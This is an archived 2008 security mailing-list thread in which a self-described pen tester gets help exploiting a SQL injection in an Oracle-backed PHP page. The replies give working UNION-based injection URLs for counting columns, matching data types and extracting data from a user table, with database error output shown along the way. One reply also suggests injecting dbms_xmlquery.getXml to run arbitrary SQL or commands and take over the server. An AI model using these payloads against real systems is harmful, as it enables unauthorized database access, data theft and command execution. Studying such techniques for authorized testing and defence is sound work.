Re: Oracle URL SQL Injection issue

From: Cesar (cesarc56@yahoo.com)
Date: Wed Jan 23 2008 - 18:37:01 EST


Hi

I would recommend first trying to get the source code,
if possible: http://x.y.z.a/dbs.inc, but I guess it
won't work; it should be a secure web server :)

Anyway, depending on the Oracle version you can easily
own it; you just need to inject a function and exploit
some known SQL injection in Oracle, or, depending on
permissions, you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your favorite sql injection exploit here or any command'))

Look at :
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip

Cesar.
--- Clone <c70n3@yahoo.co.in> wrote:

> Thanks Jeff & everyone.
>
> I've moved further after your emails. Really much
> appreciated.
>
> With Jeff's input below I enumerated that there are 2
> columns.
>
> This time I gave
>
> http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
>
> Now I get following error:
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-01790: expression must have same datatype as
> corresponding expression in dbs.inc on line 44
>
> Then I tried the following:
>
> http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
>
> http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
>
> And got the error
>
> ociexecute() [function.ociexecute]: OCIStmtExecute:
> ORA-00911: invalid character in dbs.inc on line 44
>
> The functionality of the page is to generate an
> email page/forum email page.
>
> Any idea what's next?
>
>
>
> --- jeffrey rivero <jeffr76@yahoo.com> wrote:
>
> > Hello all
> > in your Union start by finding out how many columns
> > there are
> > i.e.
> >
> > http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
> > would give you 3 columns
> >
> > http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
> > would give you 4
> > then once you have that
> > get the data types
> >
> > http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
> > for the first to be a string
> > and so on
> > then you can start to get real data from the
> > tables
> > or
> >
> > http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--
> >
> > Jeff
> >
> > Clone wrote:
> > > Hey List
> > >
> > > I am pen testing a web app that supplies sql
> > > parameters on the URL something like
> > >
> > > http://x.y.z.a/item.php?Id=90
> > >
> > > I did blind sql injection by adding AND 1=1 to
> > > confirm the vulnerability.
> > >
> > > Now when I do
> > >
> > > http://x.y.z.a/item.php?Id=90'
> > >
> > > I get
> > >
> > > ociparse() [function.ociparse]: OCIParse: ORA-01756:
> > > quoted string not properly terminated in item.php on
> > > line 312
> > >
> > > Then I tried (after confirming presence of usr
> > > table name)
> > >
> > > http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
> > >
> > > and I get the error
> > >
> > > ociexecute() [function.ociexecute]: OCIStmtExecute:
> > > ORA-01789: query block has incorrect number of result
> > > columns in dbs.inc on line 44
> > >
> > > I know one valid user account in the oracle DB.
> > >
> > > Any idea what's the best strategy to move
> > > forward?
> > >
> > > I'm not getting any further from here so far.
> > >
> > > Any advice / help would be much appreciated.
> > >
> > > Cheers
> > >
> > >
> > >
> > >
> > >
> > >
> >
>
------------------------------------------------------------------------
> > > This list is sponsored by: Cenzic
> > >
> > > Need to secure your web apps NOW?
> > > Cenzic finds more, "real" vulnerabilities fast.
> > > Click to try it, buy it or download a solution
> > FREE today!
> > >
> > > http://www.cenzic.com/downloads
> > >
> >
>
------------------------------------------------------------------------
> > >
>





This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:21 EDT